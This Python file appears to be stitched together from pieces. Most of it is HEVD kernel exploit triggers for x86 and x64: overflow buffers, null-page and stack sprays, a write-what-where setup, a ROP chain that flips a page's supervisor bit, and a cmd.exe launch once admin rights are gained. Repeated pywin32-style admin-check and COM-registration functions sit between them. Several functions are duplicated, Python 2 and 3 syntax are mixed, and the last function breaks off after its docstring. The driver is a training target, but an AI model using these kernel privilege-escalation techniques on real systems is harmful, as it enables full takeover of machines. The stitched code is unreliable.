def check_is_admin():
    """Return True when this process runs with administrator rights.

    The verdict comes from shell32's IsUserAnAdmin() and is computed once,
    then cached in the module-level ``_is_admin``.  When the shell reports
    E_NOTIMPL (the call does not exist on this Windows, presumably an old
    pre-UAC release) the check deliberately fails OPEN and answers True;
    callers must treat that answer as an assumption, not a verified token
    check.  Any other COM error propagates and leaves the cache untouched.
    """
    global _is_admin
    if _is_admin is not None:
        return _is_admin
    from win32com.shell.shell import IsUserAnAdmin
    import pythoncom
    try:
        verdict = IsUserAnAdmin()
    except pythoncom.com_error as exc:
        # Only "not implemented" is tolerated; every other failure is real and
        # must not be mistaken for an admin verdict.
        if exc.hresult != winerror.E_NOTIMPL:
            raise
        verdict = True  # fail-open by design: platform too old to ask
    _is_admin = verdict
    return _is_admin
# If this exception is raised by a test, the test is reported as a 'skip'
def trigger_integer_overflow():
    """HEVD integer-overflow trigger (IOCTL 0x222027), x86 build.

    Opens the HEVD device, builds an oversized input that ends with the
    driver's string terminator dword and submits it with the size argument
    set to 0xFFFFFFFF so the driver's length arithmetic presumably wraps.
    The payload address comes from heap_alloc_payload(); IsUserAnAdmin() is
    used afterwards as the success indicator (only meaningful when the PoC
    was started without admin rights) before a shell is spawned.
    Relies on kernel32, shell, heap_alloc_payload and the ctypes names from
    module scope.  Review: the device handle is never closed.
    """
    dwReturn = c_ulong()
    # 0xC0000000 = GENERIC_READ | GENERIC_WRITE, 0x3 = OPEN_EXISTING (Win32 constants).
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    # INVALID_HANDLE_VALUE is -1; the compare relies on ctypes' default int
    # return type, which is only exact for 32-bit handles.
    if not driver_handle or driver_handle == -1:
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()
    # [-- BUFFER PADDING --][-- EXTRA PADDING --][-- SHELLCODE PTR --][-- STRING TERMINATOR --]
    print "[+] Constructing overflow string"
    evil_input = "A" * 0x800 + "BBBB" * 10 + struct.pack("<L",heap_alloc_payload()) + struct.pack("<L",0xBAD0B0B0)
    evil_size = len(evil_input)
    # Raw address of the str's character data: id() is the PyObject address and
    # 20 is the object header size of a CPython 2 str on 32-bit.  Interpreter
    # detail - breaks on other builds (ctypes.addressof(einput) would be portable).
    evil_input_ptr = id(evil_input) + 20
    print "[+] Buf size: %d" % evil_size
    # NOTE(review): einput is built but never handed to the driver; the raw
    # pointer above is used instead.
    einput = create_string_buffer(evil_input, evil_size)
    print "[+] Triggering vuln .."
    # Size is 0xFFFFFFFF on purpose - that is the overflow trigger; the real
    # length is presumably bounded by the 0xBAD0B0B0 terminator in the buffer.
    kernel32.DeviceIoControl(driver_handle, 0x222027, evil_input_ptr, 0xFFFFFFFF, None, 0,byref(dwReturn), None)
    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[-] Exploit did not work. Re-run it!"
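def trigger_nullpointer_dereference():
    """HEVD null-pointer-dereference trigger (IOCTL 0x22202B), x86 build.

    NtAllocateVirtualMemory_shellcode_ptr() runs first (presumably mapping
    the null page with a pointer to the payload), then a magic value other
    than 0xBAD0B0B0 is sent so the driver takes its NULL-dereference path.
    IsUserAnAdmin() is the success indicator (only meaningful when the PoC
    was started without admin rights) before a shell is spawned.  Relies on
    kernel32, shell and NtAllocateVirtualMemory_shellcode_ptr from module
    scope.

    Changes vs. the original: the device handle is always closed (it leaked),
    the unused DeviceIoControl return value is dropped, and a failed
    CreateFileA exits non-zero so a wrapper can detect the failure.
    """
    dwReturn = c_ulong()
    # 0xC0000000 = GENERIC_READ | GENERIC_WRITE, 0x3 = OPEN_EXISTING.
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:  # -1 == INVALID_HANDLE_VALUE
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit(1)
    try:
        NtAllocateVirtualMemory_shellcode_ptr()
        magicvalue = struct.pack("<L", 0xBAD0B0B1)  # as long as it's not 0xBAD0B0B0
        magicvalue_size = len(magicvalue)
        # id() + 20: address of the character data of a CPython 2 str on
        # 32-bit (interpreter-specific layout, kept from the original PoC).
        magicvalue_ptr = id(magicvalue) + 20
        kernel32.DeviceIoControl(driver_handle, 0x22202B, magicvalue_ptr, magicvalue_size, None, 0, byref(dwReturn), None)
    finally:
        kernel32.CloseHandle(driver_handle)
    if shell.IsUserAnAdmin():
        print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        print("[-] Exploit did not work. Re-run it!")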
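def trigger_stack_overflow():
    """HEVD stack-overflow trigger (IOCTL 0x222003), x86 build.

    Sends 2080 filler bytes followed by the payload address returned by
    heap_alloc_payload(), so the saved return address on the driver's stack
    is presumably replaced by the payload pointer.  IsUserAnAdmin() is the
    success indicator (only meaningful when the PoC was started without
    admin rights) before a shell is spawned.  Relies on kernel32, shell and
    heap_alloc_payload from module scope.

    Changes vs. the original: the device handle is always closed (it leaked)
    and a failed CreateFileA exits non-zero.
    """
    dwReturn = c_ulong()
    # 0xC0000000 = GENERIC_READ | GENERIC_WRITE, 0x3 = OPEN_EXISTING.
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:  # -1 == INVALID_HANDLE_VALUE
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit(1)
    try:
        print("[+] Constructing malicious buffer")
        evil_input = "\x41" * 2080 + struct.pack("<L", heap_alloc_payload())
        evil_size = len(evil_input)
        # id() + 20: address of the character data of a CPython 2 str on
        # 32-bit (interpreter-specific layout, kept from the original PoC).
        evil_input_ptr = id(evil_input) + 20
        print("[+] Buf size: %d" % evil_size)
        print("[+] Sending malicious buffer")
        print("[+] Triggering vuln ..")
        kernel32.DeviceIoControl(driver_handle, 0x222003, evil_input_ptr, evil_size, None, 0, byref(dwReturn), None)
    finally:
        kernel32.CloseHandle(driver_handle)
    if shell.IsUserAnAdmin():
        print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        print("[!] Exploit did not work. Re-run it!")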
def trigger_stack_overflow_GS():
    """HEVD stack overflow with /GS cookie (IOCTL 0x222007), x86 build.

    The input buffer is a file mapping from create_map_file() and is
    submitted with a length 4 bytes longer than the mapping.  Per the
    original note the copy then faults on the unmapped tail BEFORE the GS
    cookie is verified; the exception path is what the PoC abuses, and a
    wrong setup blue-screens the machine.  IsUserAnAdmin() is the success
    indicator (only meaningful when the PoC was started without admin
    rights).  Relies on kernel32, shell and create_map_file from module
    scope.  Review: the device handle is never closed.
    """
    dwReturn = c_ulong()
    # 0xC0000000 = GENERIC_READ | GENERIC_WRITE, 0x3 = OPEN_EXISTING.
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:  # -1 == INVALID_HANDLE_VALUE
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()
    # Base address and size of the mapped file (helper defined elsewhere).
    buffer_ptr, buffer_size = create_map_file()
    print "[+] Sending malicious buffer"
    print "[+] Triggering vuln .."
    # Note buffer_size + 4 : +4 resides outside the mapped file to trigger an exception when memcpy the region
    # before GS check, which BSODs box
    kernel32.DeviceIoControl(driver_handle, 0x222007, buffer_ptr, buffer_size + 4, None, 0,byref(dwReturn) , None)
    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[!] Exploit did not work. Re-run it!"
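def trigger_uninitialized_heap_variable():
    """HEVD uninitialized-heap-variable trigger (IOCTL 0x00222033), x86 build.

    tainting_lookaside() is run first (presumably seeding the pool lookaside
    list with payload pointers), then a magic value other than 0xBAD0B0B0 is
    sent so the driver uses its heap object without initializing it.  The
    order of the magic-value allocation and the tainting call is kept from
    the original because it influences heap layout.  IsUserAnAdmin() is the
    success indicator (only meaningful when the PoC was started without
    admin rights) before a shell is spawned.  Relies on kernel32, shell and
    tainting_lookaside from module scope.

    Changes vs. the original: the device handle is always closed (it leaked)
    and a failed CreateFileA exits non-zero.
    """
    dwReturn = c_ulong()
    # 0xC0000000 = GENERIC_READ | GENERIC_WRITE, 0x3 = OPEN_EXISTING.
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:  # -1 == INVALID_HANDLE_VALUE
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit(1)
    try:
        magicvalue = struct.pack('<I', 0xBAD0B0B1)  # anything but 0xBAD0B0B0
        # id() + 20: address of the character data of a CPython 2 str on
        # 32-bit (interpreter-specific layout, kept from the original PoC).
        magicvalue_ptr = id(magicvalue) + 20
        magicvalue_size = len(magicvalue)
        tainting_lookaside()
        print("[+] Triggering vuln ..")
        kernel32.DeviceIoControl(driver_handle, 0x00222033, magicvalue_ptr, magicvalue_size, None, 0, byref(dwReturn), None)
    finally:
        kernel32.CloseHandle(driver_handle)
    if shell.IsUserAnAdmin():
        print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        print("[-] Exploit did not work. Re-run it!")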
def check_is_admin():
    """Return True when this process runs with administrator rights.

    The verdict comes from shell32's IsUserAnAdmin() and is computed once,
    then cached in the module-level ``_is_admin``.  When the shell reports
    E_NOTIMPL (the call does not exist on this Windows, presumably an old
    pre-UAC release) the check deliberately fails OPEN and answers True;
    callers must treat that answer as an assumption, not a verified token
    check.  Any other COM error propagates and leaves the cache untouched.
    """
    global _is_admin
    if _is_admin is not None:
        return _is_admin
    from win32com.shell.shell import IsUserAnAdmin
    import pythoncom
    try:
        verdict = IsUserAnAdmin()
    except pythoncom.com_error as exc:
        # Only "not implemented" is tolerated; every other failure is real and
        # must not be mistaken for an admin verdict.
        if exc.hresult != winerror.E_NOTIMPL:
            raise
        verdict = True  # fail-open by design: platform too old to ask
    _is_admin = verdict
    return _is_admin
# If this exception is raised by a test, the test is reported as a 'skip'
def check_is_admin():
    """Return True when this process runs with administrator rights.

    The verdict comes from shell32's IsUserAnAdmin() and is computed once,
    then cached in the module-level ``_is_admin``.  When the shell reports
    E_NOTIMPL (the call does not exist on this Windows, presumably an old
    pre-UAC release) the check deliberately fails OPEN and answers True;
    callers must treat that answer as an assumption, not a verified token
    check.  Any other COM error propagates and leaves the cache untouched.
    """
    global _is_admin
    if _is_admin is not None:
        return _is_admin
    from win32com.shell.shell import IsUserAnAdmin
    import pythoncom
    try:
        verdict = IsUserAnAdmin()
    except pythoncom.com_error as exc:
        # Only "not implemented" is tolerated; every other failure is real and
        # must not be mistaken for an admin verdict.
        if exc.hresult != winerror.E_NOTIMPL:
            raise
        verdict = True  # fail-open by design: platform too old to ask
    _is_admin = verdict
    return _is_admin
# If this exception is raised by a test, the test is reported as a 'skip'
def trigger_arbitrary_overwrite():
    """HEVD write-what-where trigger (IOCTL 0x22200B), x86 build.

    The driver receives a WHAT/WHERE pair.  WHERE is the address returned by
    get_HDT_kernel_address() plus 4 (per the original note, HalDispatchTable
    + 4).  WHAT is the address of a c_void_p holding the payload pointer from
    heap_alloc_payload(), i.e. the driver is given a pointer to the value to
    write, not the value itself.  NtQueryIntervalProfile is then called,
    presumably to reach the overwritten dispatch-table slot and run the
    payload.  IsUserAnAdmin() is the success indicator (only meaningful when
    the PoC was started without admin rights).  Relies on kernel32, ntdll,
    shell, heap_alloc_payload and get_HDT_kernel_address from module scope.
    Review: the device handle is never closed.
    """
    dwReturn = c_ulong()
    # 0xC0000000 = GENERIC_READ | GENERIC_WRITE, 0x3 = OPEN_EXISTING.
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:  # -1 == INVALID_HANDLE_VALUE
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()
    # [ -- WHAT (Shellcode pointer) -- ] [ -- WHERE (HDT_kernel_address + 4)-- ]
    write_what = heap_alloc_payload()
    write_where = get_HDT_kernel_address() + 4
    # write_what_ptr must stay alive until the IOCTL returns: its address is
    # what the driver dereferences to fetch the value to write.
    write_what_ptr = c_void_p(write_what)
    evil_input = struct.pack("<L", addressof(write_what_ptr)) + struct.pack("<L", write_where)
    # id() + 20: address of the str's character data (CPython 2, 32-bit
    # object layout; interpreter-specific).
    evil_input_ptr = id(evil_input) + 20
    evil_size = len(evil_input)
    print "[+] Writing 0x%X at address 0x%X" % (write_what, write_where)
    kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)
    print "[+] Calling NtQueryIntervalProfile to trigger vuln"
    # 0x1337 is presumably a deliberately unusual profile source; the output
    # value in arb is not used.
    arb = c_ulong(0)
    ntdll.NtQueryIntervalProfile(0x1337, byref(arb))
    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[-] Exploit did not work. Re-run it!"
def trigger_uninitialized_stack_variable():
    """HEVD uninitialized-stack-variable trigger (IOCTL 0x22202F), x86 build.

    A magic value other than 0xBAD0B0B0 makes the driver leave its stack
    object uninitialized.  Before the IOCTL the kernel stack is sprayed via
    NtMapUserPhysicalPages with 1024 copies of the payload address from
    heap_alloc_payload(), so the stale stack slot presumably already holds a
    pointer to the payload when the driver uses it.  IsUserAnAdmin() is the
    success indicator (only meaningful when the PoC was started without
    admin rights).  Relies on kernel32, ntdll, shell and heap_alloc_payload
    from module scope.  Review: the device handle is never closed.
    """
    dwReturn = c_ulong()
    # 0xC0000000 = GENERIC_READ | GENERIC_WRITE, 0x3 = OPEN_EXISTING.
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:  # -1 == INVALID_HANDLE_VALUE
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()
    magicvalue = struct.pack("<L", 0xBAD0B0B1) #as long as it's not 0xBAD0B0B0
    # id() + 20: address of the str's character data (CPython 2, 32-bit
    # object layout; interpreter-specific).
    magicvalue_ptr = id(magicvalue) + 20
    magicvalue_size = len(magicvalue)
    print "[+] Buf size: %d" % magicvalue_size
    # NOTE(review): einput is never used; the raw pointer above is what
    # reaches the driver.
    einput = create_string_buffer(magicvalue, magicvalue_size)
    # stack spray
    shellcode_ptr = heap_alloc_payload()
    print "[+] Spraying stack with address: 0x%X" % shellcode_ptr
    print "[+] Triggering vuln .."
    # The third argument is a 4 KiB array of the payload address passed as the
    # syscall's page list; the call itself is expected to do nothing useful.
    ntdll.NtMapUserPhysicalPages(0, 1024, struct.pack("<L", shellcode_ptr) * 1024)
    kernel32.DeviceIoControl(driver_handle, 0x22202F, magicvalue_ptr, magicvalue_size, None, 0,byref(dwReturn), None)
    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[-] Exploit did not work. Re-run it!"
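def trigger_type_confusion():
    """HEVD type-confusion trigger (IOCTL 0x222023), x86 build.

    Sends a USER_TYPE_CONFUSION_OBJECT whose ObjectID is four junk bytes and
    whose ObjectType field carries the payload address returned by
    heap_alloc_payload(); the driver is expected to treat that second field
    as a pointer and call through it.  IsUserAnAdmin() is the success
    indicator (only meaningful when the PoC was started without admin
    rights) before a shell is spawned.  Relies on kernel32, shell and
    heap_alloc_payload from module scope.

    Changes vs. the original: the device handle is always closed (it leaked),
    the unused DeviceIoControl result is dropped, and a failed CreateFileA
    exits non-zero.
    """
    dwReturn = c_ulong()
    # 0xC0000000 = GENERIC_READ | GENERIC_WRITE, 0x3 = OPEN_EXISTING.
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:  # -1 == INVALID_HANDLE_VALUE
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit(1)
    # typedef struct _USER_TYPE_CONFUSION_OBJECT {
    #     ULONG ObjectID;
    #     ULONG ObjectType;
    # } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;
    try:
        print("[+] Constructing USER_TYPE_CONFUSION_OBJECT")
        evil_input = "\x41" * 4 + struct.pack("<L", heap_alloc_payload())
        # id() + 20: address of the character data of a CPython 2 str on
        # 32-bit (interpreter-specific layout, kept from the original PoC).
        evil_input_ptr = id(evil_input) + 20
        evil_size = len(evil_input)
        print("[+] Buf size: %d" % evil_size)
        print("[+] Sending confusion object")
        print("[+] Triggering vuln ..")
        kernel32.DeviceIoControl(driver_handle, 0x222023, evil_input_ptr, evil_size, None, 0, byref(dwReturn), None)
    finally:
        kernel32.CloseHandle(driver_handle)
    if shell.IsUserAnAdmin():
        print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        print("[!] Exploit did not work. Re-run it!")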
def trigger_stack_overflow():
    """HEVD stack-overflow trigger (IOCTL 0x222003), x64 build with ROP.

    Because the payload lives in a user-mode page, the chain first patches
    that page's PTE so it counts as supervisor memory (the original notes
    "Supervisor Mode" for the 0x63000000 value written at PTE - 3), flushes
    the cache/TLB, and only then returns into the payload from
    virtual_alloc_payload().  Gadget addresses are base + hard-coded offsets
    into hal.dll and win32kfull.sys, so the chain is only valid for the exact
    binary builds those offsets were taken from.  IsUserAnAdmin() is the
    success indicator (only meaningful when the PoC was started without
    admin rights).  Relies on kernel32, shell, debug_print, get_base_address,
    get_pxe_address and virtual_alloc_payload from module scope.
    Review: the device handle is never closed.
    """
    dwReturn = c_ulong()
    # 0xC0000000 = GENERIC_READ | GENERIC_WRITE, 0x3 = OPEN_EXISTING.
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:  # -1 == INVALID_HANDLE_VALUE
        debug_print ("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()
    # Kernel image bases needed to rebase the gadget offsets below.
    base_addresses = get_base_address(["hal.dll", "win32kfull.sys"])
    hal_base_address = base_addresses[0]
    win32kfull_base_address = base_addresses[1]
    shellcode_ptr = virtual_alloc_payload()
    debug_print ("[+] Constructing malicious buffer w/ ROP chain")
    # 0x808 bytes of filler reach the saved return address; the chain follows.
    evil_input = "\x41" * 0x808 # junk
    evil_input += struct.pack("<Q", win32kfull_base_address + 0xD1122) # POP RDX; RETN
    evil_input += struct.pack("<Q", 0x63000000) # 0x63000000 -> Supervisor Mode
    evil_input += struct.pack("<Q", hal_base_address + 0xFDB2) # POP RAX; RETN
    # Writing the dword 0x63000000 at PTE - 3 lands its 0x63 byte on the PTE's
    # lowest byte (little-endian), presumably clearing the user/supervisor bit.
    evil_input += struct.pack("<Q", get_pxe_address(shellcode_ptr) - 3) # PTE(shellcode ptr) - 3
    evil_input += struct.pack("<Q", hal_base_address + 0x9943) # MOV [RAX], EDX; RETN
    evil_input += struct.pack("<Q", hal_base_address + 0x19B20) # Invalidate Cache
    evil_input += struct.pack("<Q", shellcode_ptr) # shellcode ptr
    evil_size = len(evil_input)
    # id() + 32: address of the str's character data for a CPython 2 str on
    # 64-bit Windows (interpreter-specific object layout).
    evil_input_ptr = id(evil_input) + 32
    debug_print ("[+] Buf size: 0x%X" % evil_size)
    debug_print ("[+] Sending malicious buffer")
    debug_print ("[+] Triggering vuln ..")
    kernel32.DeviceIoControl(driver_handle, 0x222003, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)
    if shell.IsUserAnAdmin():
        debug_print ("[*] Enjoy Elevated Privs !\n")
        os.system('cmd.exe')
    else:
        debug_print ("[!] Exploit did not work. Re-run it!")
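def RegisterPythonServer(filename, progids=None, verbose=0):
    """Register the Python COM server in *filename* unless it already is.

    When *progids* (a ProgID or list of ProgIDs) is given, each is resolved
    to a CLSID and the CLSID's InprocServer32 value is compared with this
    Python's pythoncom DLL; if every ProgID matches, nothing is done.
    Otherwise the server is registered by running the script with the
    current interpreter and ``--unattended``.

    Args:
        filename: path of the COM server script to register.
        progids: ProgID or list of ProgIDs the server is expected to provide.
        verbose: when truthy, print what is being registered.

    Raises:
        pythoncom.com_error (CO_E_CLASSSTRING): registration is needed but
            the process is not an administrator (or cannot tell).
        RuntimeError: the registration command exited non-zero.

    Changes vs. the original: the registration command is run as an argument
    list without a shell, so a filename containing quotes or an interpreter
    path containing spaces can neither break nor inject into the command
    line; the "not an administrator" message no longer indexes progids[0]
    (and why_not is always bound) when progids was not supplied; the
    registry key is read without leaving an open key handle.
    """
    import subprocess

    why_not = None  # set when a progid is registered for a different Python
    if progids:
        if isinstance(progids, str):
            progids = [progids]
        # We know the CLSIDs we need, but we might not be an admin user and so
        # unable to register them.  As long as the progids exist and the DLL
        # points at our Python version, assume it already is registered.
        ok_files = [os.path.basename(pythoncom.__file__),
                    'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])]
        for progid in progids:
            try:
                clsid = pythoncom.MakeIID(progid)
            except pythoncom.com_error:
                break  # no such progid - not registered.
            try:
                # Default value of HKCR\CLSID\{clsid}\InprocServer32.
                dll = winreg.QueryValue(winreg.HKEY_CLASSES_ROOT,
                                        "CLSID\\%s\\InprocServer32" % clsid)
            except WindowsError:
                break  # no CLSID or InprocServer32 - not good!
            if os.path.basename(dll) not in ok_files:
                why_not = "%r is registered against a different Python version (%s)" % (progid, dll)
                break
        else:
            # No break: every progid resolves to our DLL - already registered.
            return
    # Needs registration - see if it is likely to succeed.
    try:
        from win32com.shell.shell import IsUserAnAdmin
    except ImportError:
        print("Can't import win32com.shell - no idea if you are an admin or not?")
        is_admin = False
    else:
        try:
            is_admin = IsUserAnAdmin()
        except pythoncom.com_error:
            # Old OS where the call is not implemented - deliberately fails
            # open and assumes admin (kept from the original).
            is_admin = True
    if not is_admin:
        what = progids[0] if progids else filename
        msg = "%r isn't registered, but I'm not an administrator who can register it." % what
        if why_not:
            msg += "\n(registration check failed as %s)" % why_not
        # Throw a normal "class not registered" exception - callers do not
        # report those the same way as "real" errors.
        raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1)
    # So theoretically we are able to register it.  Argument list, no shell:
    # the interpreter path and filename are passed verbatim, whatever they
    # contain.  Output is discarded as the original's '> nul 2>&1' did.
    cmd = [win32api.GetModuleFileName(0), filename, "--unattended"]
    if verbose:
        print("Registering engine", filename)
    rc = subprocess.call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
    if rc:
        print("Registration command was:")
        print(subprocess.list2cmdline(cmd))
        raise RuntimeError("Registration of engine '%s' failed" % filename)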
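def RegisterPythonServer(filename, progids=None, verbose=0):
    """Register the Python COM server in *filename* unless it already is.

    When *progids* (a ProgID or list of ProgIDs) is given, each is resolved
    to a CLSID and the CLSID's InprocServer32 value is compared with this
    Python's pythoncom DLL; if every ProgID matches, nothing is done.
    Otherwise the server is registered by running the script with the
    current interpreter and ``--unattended``.

    Args:
        filename: path of the COM server script to register.
        progids: ProgID or list of ProgIDs the server is expected to provide.
        verbose: when truthy, print what is being registered.

    Raises:
        pythoncom.com_error (CO_E_CLASSSTRING): registration is needed but
            the process is not an administrator (or cannot tell).
        RuntimeError: the registration command exited non-zero.

    Changes vs. the original: the registration command is run as an argument
    list without a shell, so a filename containing quotes or an interpreter
    path containing spaces can neither break nor inject into the command
    line; the "not an administrator" message no longer indexes progids[0]
    (and why_not is always bound) when progids was not supplied; the
    registry key is read without leaving an open key handle.
    """
    import subprocess

    why_not = None  # set when a progid is registered for a different Python
    if progids:
        if isinstance(progids, basestring):
            progids = [progids]
        # we know the CLSIDs we need, but we might not be an admin user
        # and otherwise unable to register them. So as long as the progids
        # exist and the DLL points at our version, assume it already is.
        ok_files = [os.path.basename(pythoncom.__file__),
                    'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])]
        for progid in progids:
            try:
                clsid = pythoncom.MakeIID(progid)
            except pythoncom.com_error:
                break  # no progid - not registered.
            try:
                # Default value of HKCR\CLSID\{clsid}\InprocServer32.
                dll = _winreg.QueryValue(_winreg.HKEY_CLASSES_ROOT,
                                         "CLSID\\%s\\InprocServer32" % clsid)
            except WindowsError:
                break  # no CLSID or InProcServer32 - not good!
            if os.path.basename(dll) not in ok_files:
                why_not = "%r is registered against a different Python version (%s)" % (progid, dll)
                break
        else:
            # No break: every progid resolves to our DLL - already registered.
            return
    # needs registration - see if its likely!
    try:
        from win32com.shell.shell import IsUserAnAdmin
    except ImportError:
        print "Can't import win32com.shell - no idea if you are an admin or not?"
        is_admin = False
    else:
        try:
            is_admin = IsUserAnAdmin()
        except pythoncom.com_error:
            # old, less-secure OS - assume *is* admin (fails open by design).
            is_admin = True
    if not is_admin:
        what = progids[0] if progids else filename
        msg = "%r isn't registered, but I'm not an administrator who can register it." % what
        if why_not:
            msg += "\n(registration check failed as %s)" % why_not
        # throw a normal "class not registered" exception - we don't report
        # them the same way as "real" errors.
        raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1)
    # so theoretically we are able to register it. Argument list, no shell:
    # the interpreter path and filename are passed verbatim, whatever they
    # contain.  Output is discarded as the original's '> nul 2>&1' did.
    cmd = [win32api.GetModuleFileName(0), filename, "--unattended"]
    if verbose:
        print "Registering engine", filename
    with open(os.devnull, 'w') as devnull:
        rc = subprocess.call(cmd, stdout=devnull, stderr=subprocess.STDOUT)
    if rc:
        print "Registration command was:"
        print subprocess.list2cmdline(cmd)
        raise RuntimeError("Registration of engine '%s' failed" % filename)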
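def RegisterPythonServer(filename, progids=None, verbose=0):
    """Register the Python COM server in *filename* unless it already is.

    When *progids* (a ProgID or list of ProgIDs) is given, each is resolved
    to a CLSID and the CLSID's InprocServer32 value is compared with this
    Python's pythoncom DLL; if every ProgID matches, nothing is done.
    Otherwise the server is registered by running the script with the
    current interpreter and ``--unattended``.

    Args:
        filename: path of the COM server script to register.
        progids: ProgID or list of ProgIDs the server is expected to provide.
        verbose: when truthy, print what is being registered.

    Raises:
        pythoncom.com_error (CO_E_CLASSSTRING): registration is needed but
            the process is not an administrator (or cannot tell).
        RuntimeError: the registration command exited non-zero.

    Changes vs. the original: the registration command is run as an argument
    list without a shell, so a filename containing quotes or an interpreter
    path containing spaces can neither break nor inject into the command
    line; the "not an administrator" message no longer indexes progids[0]
    (and why_not is always bound) when progids was not supplied; the
    registry key is read without leaving an open key handle.
    """
    import subprocess

    why_not = None  # set when a progid is registered for a different Python
    if progids:
        if isinstance(progids, basestring):
            progids = [progids]
        # we know the CLSIDs we need, but we might not be an admin user
        # and otherwise unable to register them. So as long as the progids
        # exist and the DLL points at our version, assume it already is.
        ok_files = [os.path.basename(pythoncom.__file__),
                    'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])]
        for progid in progids:
            try:
                clsid = pythoncom.MakeIID(progid)
            except pythoncom.com_error:
                break  # no progid - not registered.
            try:
                # Default value of HKCR\CLSID\{clsid}\InprocServer32.
                dll = _winreg.QueryValue(_winreg.HKEY_CLASSES_ROOT,
                                         "CLSID\\%s\\InprocServer32" % clsid)
            except WindowsError:
                break  # no CLSID or InProcServer32 - not good!
            if os.path.basename(dll) not in ok_files:
                why_not = "%r is registered against a different Python version (%s)" % (progid, dll)
                break
        else:
            # No break: every progid resolves to our DLL - already registered.
            return
    # needs registration - see if its likely!
    try:
        from win32com.shell.shell import IsUserAnAdmin
    except ImportError:
        print "Can't import win32com.shell - no idea if you are an admin or not?"
        is_admin = False
    else:
        try:
            is_admin = IsUserAnAdmin()
        except pythoncom.com_error:
            # old, less-secure OS - assume *is* admin (fails open by design).
            is_admin = True
    if not is_admin:
        what = progids[0] if progids else filename
        msg = "%r isn't registered, but I'm not an administrator who can register it." % what
        if why_not:
            msg += "\n(registration check failed as %s)" % why_not
        # throw a normal "class not registered" exception - we don't report
        # them the same way as "real" errors.
        raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1)
    # so theoretically we are able to register it. Argument list, no shell:
    # the interpreter path and filename are passed verbatim, whatever they
    # contain.  Output is discarded as the original's '> nul 2>&1' did.
    cmd = [win32api.GetModuleFileName(0), filename, "--unattended"]
    if verbose:
        print "Registering engine", filename
    with open(os.devnull, 'w') as devnull:
        rc = subprocess.call(cmd, stdout=devnull, stderr=subprocess.STDOUT)
    if rc:
        print "Registration command was:"
        print subprocess.list2cmdline(cmd)
        raise RuntimeError("Registration of engine '%s' failed" % filename)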
def trigger_arbitrary_overwrite():
    """HEVD write-what-where (IOCTL 0x22200B), x64 build, GDI-bitmap primitive.

    Two GDI bitmaps ("Manager" and "Worker") are placed at predictable
    kernel addresses by allocating and freeing accelerator tables first;
    per the original notes the pvscan0 field of each lives 0x50 bytes past
    the freed address.  The driver's single write then points Manager's
    pvscan0 at Worker's pvscan0, after which read_virtual / write_virtual
    (presumably bitmap-bits helpers defined elsewhere) give arbitrary kernel
    read/write.  That primitive copies the SYSTEM process token into this
    process's EPROCESS at token_offset.  IsUserAnAdmin() is the success
    indicator (only meaningful when the PoC was started without admin
    rights).  Relies on kernel32, shell, debug_print, token_offset and the
    setup/lookup helpers from module scope; the global bitmap handles are
    presumably assigned by the setup_*_bitmap helpers.  Statement order is
    part of the heap grooming and must not be changed casually.
    Review: the device handle is never closed.
    """
